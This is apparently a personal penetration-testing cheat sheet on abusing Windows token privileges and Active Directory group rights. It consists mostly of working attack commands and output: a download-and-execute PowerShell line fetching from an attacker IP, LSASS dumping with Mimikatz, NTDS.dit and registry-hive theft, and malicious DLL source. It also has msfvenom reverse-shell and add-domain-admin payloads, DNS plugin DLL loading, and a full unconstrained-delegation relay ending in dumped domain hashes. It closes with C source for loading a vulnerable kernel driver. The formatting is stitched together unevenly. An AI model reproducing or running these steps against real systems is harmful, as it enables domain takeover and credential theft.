Abuse Tokens
Last updated
Last updated
If you compromise and service account for example svc_mssql account and the permission are disabled you can use the next tool to enable them.
Tools:
CLSIDS working for Windows 2019/2022
c980e4c2-c178-4572-935d-a8a429884806
90f18417-f0f1-484e-9d3c-59dceee5dbd8
03ca98d6-ff5d-49b8-abc6-03dd84127020
d99e6e73-fc88-11d0-b498-00a0c90312f3
42cbfaa7-a4a7-47bb-b422-bd10e9d02700
000c101c-0000-0000-c000-000000000046
1bf48339-d15e-45f3-ad55-a851cb66be6b
49e6370b-ab71-40ab-92f4-b009539e4518
50d185b9-fff3-4656-92c7-e4018da4361d
3c6859ce-230b-484d-be6c-9320c0202408PS C:\\htb> Import-Module .\\Enable-Privilege.ps1
PS C:\\htb> .\\EnableAllTokenPrivs.ps1
PS C:\\htb> whoami /priv
filess method:
IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.123/EnableAllTokenPrivs.ps1>');
#Check File permission
PS C:\\htb> Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
PS C:\\htb>takeown /f 'C:\\some\\file.txt' #Now the file is owned by you
PS C:\\htb> icacls 'C:\\some\\file.txt' /grant <your_username>:F #Now you have full access
# Use this with files that might contain credentials such as
%WINDIR%\\repair\\sam
%WINDIR%\\repair\\system
%WINDIR%\\repair\\software
%WINDIR%\\repair\\security
%WINDIR%\\system32\\config\\security.sav
%WINDIR%\\system32\\config\\software.sav
%WINDIR%\\system32\\config\\system.sav
%WINDIR%\\system32\\config\\SecEvent.Evt
%WINDIR%\\system32\\config\\default.sav
c:\\inetpub\\wwwwroot\\web.config
C:\\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
PS C:\\htb> Import-Module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)Members of this group can read event logs from local computers. The group is created when the server is promoted to a domain controller.
Process Name generated: 4688(S): A new process has been created. (This event generates every time a new process starts.)
#Searching Security Logs Using wevtutil
PS C:\\htb> wevtutil qe Security /rd:true /f:text | Select-String "/user"
C:\\htb> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
#Searching Security Logs Using Get-WinEvent
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}Note: Searching the Security event log with Get-WInEvent requires administrator access or permissions adjusted on the registry key HKLM\\System\\CurrentControlSet\\Services\\Eventlog\\Security. Membership in just the Event Log Readers group is not sufficient.
#Import Libraries
PS C:\\htb> Import-Module .\\SeBackupPrivilegeUtils.dll
PS C:\\htb> Import-Module .\\SeBackupPrivilegeCmdLets.dll
#Enabling SeBackupPrivilege
PS C:\\htb> Set-SeBackupPrivilege
PS C:\\htb> Get-SeBackupPrivilege
#Abusing of seBackupPrivilege
PS C:\\htb> Copy-FileSeBackupPrivilege 'C:\\Confidential\\2021 Contract.txt' .\\Contract.txt
PS C:\\htb> Copy-FileSeBackupPrivilege E:\\Windows\\NTDS\\ntds.dit C:\\Tools\\ntds.dit
#Attacking a Domain Controller - Copying NTDS.dit
PS C:\\htb> diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 10/14/2020 12:57:52 AM
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\\Windows\\Temp\\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
PS C:\\htb> dir E:
# Backing up SAM and SYSTEM Registry Hives
C:\\htb> reg save HKLM\\SYSTEM SYSTEM.SAV
C:\\htb> reg save HKLM\\SAM SAM.SAV
#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key
#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
#Copying Files with Robocopy
C:\\htb> robocopy /B E:\\Windows\\NTDS .\\ntds ntds.dit
Malicious Custom DLL
Intrusionz3r0@htb[/htb]$ x86_64-w64-mingw32-gcc -o pwn.dll pwn.c -shared
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
int pwn()
{
system("COMMAND-HERE");
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
pwn();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}#Create Maicious DLL by using msfvenom
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -a x64 -f dll > rev.dll
#Loading Custom DLL
C:\\htb> dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
C:\\htb> sc stop dns
C:\\htb> sc start dns
#Clean up (Run as Administrator Shell)
C:\\htb> reg query \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters
C:\\htb> reg delete \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters /v ServerLevelPluginDll
C:\\htb> sc.exe start dns
C:\\htb> sc query dns
#Disabling the Global Query Block List
C:\\htb> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
C:\\htb> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3
#Starting the Mozilla Maintenance Service
C:\\htb> takeown /F C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe
#Starting the Mozilla Maintenance Service
C:\\htb> sc.exe start MozillaMaintenanceIf you possess the ability to add computer SeMachineAccountPrivilege and SeEnableDelegationPrivilege you can abuse oof unconstrained delegation.
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL addedWORKSTATION_TRUST_ACCOUNT
4096
Indicate is a machine account (mandatory)
TRUSTED_FOR_DELEGATION
524288
Enable Unconstrained Delegation
Total: 524288 + 4096 = 528384
#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updatedNote: make computer look like a real service by adding SPN HTTP/EVIL.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfullyTake time to replicate you can use nslookup evil.delegate.vl dc1.delegate.vl to sure is replicated into AD.
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71Use: pypykatz crypto nt 'Password123'
❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIF>❯ impacket-addcomputer delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account z3r0$ with password Password123.❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vlbloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up... #Querying the AppReadiness Service to check the status
C:\htb> sc qc AppReadiness
#C:\\htb> c:\\Tools\\PsService.exe security AppReadiness
C:\htb> c:\Tools\PsService.exe security AppReadiness
#Modifying the Service Binary Path (Abuse)
C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
#Starting the Service
C:\htb> sc start AppReadinessIf we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC.
/*
Reference:
Compile: sudo apt install mingw-w64 -y && x86_64-w64-mingw32-g++ -o EnableSeLoadDriverPrivilege.exe EnableSeLoadDriverPrivilege.cpp -DUNICODE -D_UNICODE
<https://github.com/hatRiot/token-priv>
<https://github.com/TarlogicSecurity/EoPLoadDriver>
Enable the SeLoadDriverPrivilege of current process and then load the driver into the kernel.
First you need to add two reg keys,the command is:
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\test\\Capcom.sys"
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v Type /t REG_DWORD /d 1
Then run me to load the driver(C:\\test\\Capcom.sys) into the kernel.
We will have all access on the system.
*/
#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"Ntdll.lib")
LPWSTR getUserSid(HANDLE hToken)
{
// Get the size of the memory buffer needed for the SID
//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx
DWORD dwBufferSize = 0;
if (!GetTokenInformation(hToken, TokenUser, NULL, 0, &dwBufferSize) &&
(GetLastError() != ERROR_INSUFFICIENT_BUFFER))
{
wprintf(L"GetTokenInformation failed, error: %d\\n",
GetLastError());
return NULL;
}
//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
PTOKEN_USER pUserToken = (PTOKEN_USER)HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwBufferSize);
if (pUserToken == NULL) {
HeapFree(GetProcessHeap(), 0, (LPVOID)pUserToken);
return NULL;
}
// Retrive token info
if (!GetTokenInformation(
hToken,
TokenUser,
pUserToken,
dwBufferSize,
&dwBufferSize))
{
GetLastError();
return NULL;
}
// Check if SID is valid
if (!IsValidSid(pUserToken->User.Sid))
{
wprintf(L"The owner SID is invalid.\\n");
return NULL;
}
LPWSTR sidString;
ConvertSidToStringSidW(pUserToken->User.Sid, &sidString);
return sidString;
}
ULONG
LoadDriver(HANDLE hToken)
{
UNICODE_STRING DriverServiceName;
ULONG dwErrorCode;
NTSTATUS status;
typedef NTSTATUS(_stdcall *NT_LOAD_DRIVER)(IN PUNICODE_STRING DriverServiceName);
typedef void (WINAPI* RTL_INIT_UNICODE_STRING)(PUNICODE_STRING, PCWSTR);
NT_LOAD_DRIVER NtLoadDriver = (NT_LOAD_DRIVER)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtLoadDriver");
RTL_INIT_UNICODE_STRING RtlInitUnicodeString = (RTL_INIT_UNICODE_STRING)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");
LPWSTR win7regPath = new WCHAR[MAX_PATH];
ZeroMemory(win7regPath, MAX_PATH);
LPWSTR userSidStr;
userSidStr = getUserSid(hToken);
if (userSidStr == NULL)
{
wprintf(L"[+] Error while getting user SID\\n");
CloseHandle(hToken);
hToken = NULL;
}
lstrcat(win7regPath, L"\\\\Registry\\\\User\\\\");
lstrcat(win7regPath, userSidStr);
lstrcat(win7regPath, L"\\\\System\\\\CurrentControlSet\\\\CAPCOM");
RtlInitUnicodeString(&DriverServiceName, win7regPath);
status = NtLoadDriver(&DriverServiceName);
printf("NTSTATUS: %08x, WinError: %d\\n", status, GetLastError());
if (!NT_SUCCESS(status))
return RtlNtStatusToDosError(status);
return 0;
}
int IsTokenSystem(HANDLE tok)
{
DWORD Size, UserSize, DomainSize;
SID *sid;
SID_NAME_USE SidType;
TCHAR UserName[64], DomainName[64];
TOKEN_USER *User;
Size = 0;
GetTokenInformation(tok, TokenUser, NULL, 0, &Size);
if (!Size)
return 0;
User = (TOKEN_USER *)malloc(Size);
assert(User);
GetTokenInformation(tok, TokenUser, User, Size, &Size);
assert(Size);
Size = GetLengthSid(User->User.Sid);
assert(Size);
sid = (SID *)malloc(Size);
assert(sid);
CopySid(Size, sid, User->User.Sid);
UserSize = (sizeof UserName / sizeof *UserName) - 1;
DomainSize = (sizeof DomainName / sizeof *DomainName) - 1;
LookupAccountSid(NULL, sid, UserName, &UserSize, DomainName, &DomainSize, &SidType);
free(sid);
printf("whoami:\\n%S\\\\%S\\n", DomainName, UserName);
if (!_wcsicmp(UserName, L"SYSTEM"))
return 0;
return 1;
}
VOID RetPrivDwordAttributesToStr(DWORD attributes, LPTSTR szAttrbutes)
{
UINT len = 0;
if (attributes & SE_PRIVILEGE_ENABLED)
len += wsprintf(szAttrbutes, TEXT("Enabled"));
if (attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
len += wsprintf(szAttrbutes, TEXT("Enabled by default"));
if (attributes & SE_PRIVILEGE_REMOVED)
len += wsprintf(szAttrbutes, TEXT("Removed"));
if (attributes & SE_PRIVILEGE_USED_FOR_ACCESS)
len += wsprintf(szAttrbutes, TEXT("Used for access"));
if (szAttrbutes[0] == 0)
wsprintf(szAttrbutes, TEXT("Disabled"));
return;
}
int GetTokenPrivilege(HANDLE tok)
{
PTOKEN_PRIVILEGES ppriv = NULL;
DWORD dwRet = 0;
GetTokenInformation(tok, TokenGroups, ppriv, dwRet, &dwRet);
if (!dwRet)
return 0;
ppriv = (PTOKEN_PRIVILEGES)calloc(dwRet, 1);
GetTokenInformation(tok, TokenPrivileges, ppriv, dwRet, &dwRet);
printf("\\nwhoami /priv\\n");
for (int i = 0; i < ppriv->PrivilegeCount; i++)
{
TCHAR lpszPriv[MAX_PATH] = { 0 };
DWORD dwRet = MAX_PATH;
BOOL n = LookupPrivilegeName(NULL, &(ppriv->Privileges[i].Luid), lpszPriv, &dwRet);
printf("%-50ws", lpszPriv);
TCHAR lpszAttrbutes[1024] = { 0 };
RetPrivDwordAttributesToStr(ppriv->Privileges[i].Attributes, lpszAttrbutes);
printf("%ws\\n", lpszAttrbutes);
}
return 1;
}
BOOL EnablePriv(HANDLE hToken, LPCTSTR priv)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, priv, &luid))
{
printf("[!]LookupPrivilegeValue error\\n");
return 0;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
printf("[!]AdjustTokenPrivileges error\\n");
return 0;
}
IsTokenSystem(hToken);
GetTokenPrivilege(hToken);
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
{
printf("[!]OpenProcessToken error\\n");
return 0;
}
EnablePriv(hToken, SE_LOAD_DRIVER_NAME);
LoadDriver(hToken);
return 0;
}Favorite tool: (Windows Server 2019/2022)
UserAccountControl Values:
